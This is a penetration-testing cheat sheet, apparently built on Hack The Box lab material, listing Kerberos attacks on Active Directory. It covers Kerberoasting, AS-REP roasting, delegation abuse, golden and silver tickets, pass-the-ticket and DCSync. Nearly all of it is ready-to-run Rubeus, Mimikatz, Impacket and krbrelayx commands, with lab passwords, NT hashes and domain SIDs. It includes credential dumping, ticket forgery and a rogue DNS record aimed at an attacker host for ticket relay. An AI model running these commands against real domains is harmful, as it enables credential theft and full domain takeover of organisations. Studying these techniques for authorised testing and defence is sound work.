Kerberos Attacks

From Linux

GetUserSPN

# Request 1 Ticket
GetUsersSPNs.py -dc-ip <ip> <domain/<user> -request-user <username>

# Request All Tickets
GetUsersSPNs.py -dc-ip <ip> <domain/<user --request

# Save to Output
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOU

From Windows

setspn.exe

# Find Accounts with SPN
setspn.exe -Q */*

# Better Command
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Mimikatz

# Enable Base64 Output
base64 /out:true

# Export Tickets
kerberos::list /export  

# Modify To Better Format
echo "<base64 blob>" |  tr -d \\n 

# Output To John Format
cat encoded_file | base64 -d > sqldev.kirbi

# Make to John Format
python2.7 kirbi2john.py sqldev.kirbi

# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'

PowerView

# Import Module
Import-Module .\PowerView.ps1

# List Users With SPN
Get-DomainUser * -spn | select samaccountname

# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Rubeus

# /Stats
.\Rubeus.exe kerberoast /stats

# List Admin Privileges Users for Kerberoasting
 .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Double Hop Workarounds

Method 1: PSCredential Object

# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force

# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

# Use Command with Credentials
get-domainuser -spn -credential $Cred | select samaccountname

Method 2: Register PSSession Configuration

# Check HTTP Ticket Present
klist

# Configure PSSession
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm

# Connect 
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName  backupadmsess

Roasting Attacks

AS-REPRoasting (Windows)

AS-REP Roasting Enumeration

# PowerView: Discover Account with Pre-Authentication Disbaled
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol

# Rubeus: Enumerate all user Accounts for Pre-Authentication
Rubeus.exe asreproast /format:hashcat

Performing AS-REPRoasting

# Rubeus
 .\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt

# Crack the Hash
hashcat.exe -m 18200 hashes $ROCKYOU

Set DONT_REQ_PREAUTH (PowerView)

Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

AS-REPRoasting (LInux)

AS-REPRoasting Users Enumeration

GetNPUsers.py inlanefreight.local/pixis -request

Find Accounts Without Authentication

GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass

Kerberoasting (Windows)

Manual Detection (PowerShell Script)

$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
{
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User" 
    Write-Host "===="
    Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
        Write-host ""
    Write-host "SPNs"
    Write-Host "===="     
    foreach($SPN in $userEntry.servicePrincipalName)
    {
        $SPN       
    }
    Write-host ""
    Write-host ""
}

# Run Script
.\FindSPNAccounts.ps1

Find Accounts with SPN (PowerView)

# Find Accounts
Get-DomanUser -SPN | select samaccountname, serviceprincipalname,memberof

Invoke Kerberoasting (PowerView)

Invoke-Kerberoast

Rubeus Kerberoasting

Rubeus.exe kerberoast /nowrap

Kerberoasting Without Account Password

https://www.semperis.com/blog/new-attack-paths-as-requested-sts/

In order to perform this attack, we need the following:

Username of an account with pre-authentication.
A target SPN.

Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap

Kerberoasting (Linux)

Get Account SPN

GetUserSPNs.py inlanefreight.local/pixis -request

Unconstrained Delegation

Unconstrained Delegation - Computer

Method 1 (Waiting Authentication)

1 Monitor Stored Tickets (Rubeus)

.\Rubeus.exe monitor /interval:5 /nowrap

2 Using Captured Ticket to Request Another Ticket

.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt

3 Using Newly ticket

dir \\dc01.inlanefreight.local\c$

Method 2 (Printer Bug)

https://github.com/leechristensen/SpoolSample

1 Monitor Tickets

.\Rubeus.exe monitor /interval:5 /nowrap

2 Abusing Printer Bug

 .\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local

3 Captare & Renew Ticket

# Once Intercepted, we need to renew the ticket
.\Rubeus.exe renew /ticket:<base64> /ptt

4 DcSync

# Since we haveTicket from dc01 and can dump all the hashes
lsadump::dcsync

5 Using NT Hash

# With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt

# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$

Unconstrained Delegation - Users

Gather Unconstrained Delegation Users (Powerview)

Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol

1 Create Fake DNS Record

https://github.com/dirkjanm/krbrelayx

# Host DNS Server
python dnstool.py -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207

2 Verify DNS

nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local

3 Craft SPN

python addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

4 Decrypt Ticket

sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58

5 Leveraging Printer Bug

https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 fakepcs.inlanefreight.local

6 Perform Attack

sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58

7 Export ccache + Secrets Dump

export KRB5CCNAME=<ccache>

secretsdump.py -k -no-pass dc01.inlanefreight.local

Constrained Delegation

Constrained Delegation (Windows)

Gather Constrained Delegation Computers

Get-DomainCoputer -TrustedAuth | select serviceprincipalname,dnshostname,useraccountcontrol

1 Get Machine Hash (Mimikatz)

.\mimikatz.exe privilege::debug sekurlsa::msv exit

2 Constrained Delegation Attack

# Need Machine Hash as rc4
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt

# Verify Ticket
klist

# Enter Session
Enter-PSSession ws01.inlanefreight.local

Constrained Delegation (Linux)

1 Find Delegation Accounts

findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine

2 Craft Valid TGS Ticket

getST.py -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator

# Export ccache
export KRB5CCNAME=<ccache>

# Login
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug

Resource Based Delegation (Windows)

Enumerate RBCD Script

# import the PowerView module
Import-Module C:\Tools\PowerView.ps1

# get all computers in the domain
$computers = Get-DomainComputer

# get all users in the domain
$users = Get-DomainUser

# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"

# loop through each computer in the domain
foreach ($computer in $computers) {
    # get the security descriptor for the computer
    $acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs

    # loop through each user in the domain
    foreach ($user in $users) {
        # check if the user has the required access rights on the computer object
        $hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}

        if ($hasAccess) {
            Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
        }
    }
}

1 Create Fake Computer

# Import PowerMad
Import-Module .\Powermad.ps1

# Add New Computer
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)

2 Modify Attributes Created Computer

Obtain Computer SID.
Use SDDL to create a security descriptor
Set msDS-AllowedToActOnBehalfOfOtherIdentity in raw binary format.
Modify the target computer.

# Import PowerView
Import-Module .\PowerView.ps1

# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid

# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

# Step 3
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)

# Step 4
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose

3 Get Computer Hash

.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local

4 Request TGS Ticket

# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt

# Connect to DC
ls \\dc01.inlanefreight.local\c$

Resource Based Delegation (Linux)

1 Create a New Computer

addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+\! -dc-ip 10.129.96.44 inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd'

2 Add Computer to Trusted List

https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py

 python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'

3 Request TGS Ticket

getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 inlanefreight.local/HACKTHEBOX:Hackthebox123+\!

# Export ccache
export KRB5CCNAME=<ccache>

# psexec
psexec.py -k -no-pass dc01.inlanefreight.local

Ticket Abuse

Golden Ticket (Windows)

We need 4 elements in order to perform a Golden Ticket attack.

Domain Name
Domain SID
KRBTGT's Hash
Username to impersonate

1 Gather Domain Name

Get-Domain

2 Gather Domain SID

Get-DomainSID

3 Gather krbtgt Hash

.\mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit

4 Forge Golden Ticket

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"

Enter-PSSession dc01

Golden Ticket (Linux)

1 Gather Domain (SID)

lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

2 Create Golden Ticket

ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator

3 Importing and Use Ticket

export KRB5CCNAME=<ccache>

# Login
psexec.py -k -no-pass dc01.inlanefreight.local

Silver Ticket (Windows)

1 Gather Domain SID

Get-DomainSid

2 Compromised Service Account

Without this account, a silver ticket is not possible

3 Forge Silver Ticket

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs  /ptt" "exit"

Create Sacrificial Process

# Create Process
Rubeus.exe createnetonly /program:cmd.exe /show

# Import Silver Ticket
Rubeus.exe ptt /ticket:sql01.kirbi

# Login
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd

Silver Ticket (Linux)

1 Retrieve Domain SID

lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

2 Create Silver Ticket

ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator

3 Export ccache

export KRB5CCNAME=<ccache>

# Login
smbclient.py -k -no-pass sql01.inlanefreight.local

Pass The Ticket

Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement.

1 Create Sacrificial Process

.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

2 Read Tickets

.\rubeus.exe triage

3 Extract Ticket With Rubeus

#  krbtgt/INLANEFREIGHT.LOCAL
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

4 Renew Ticket

Rubeus.exe renew /ticket:<base64> /ptt

4 Read Files

dir \\dc01\\c$

PreviousCredential Theft NextKerberos Quick Reference Sheet

Last updated 1 year ago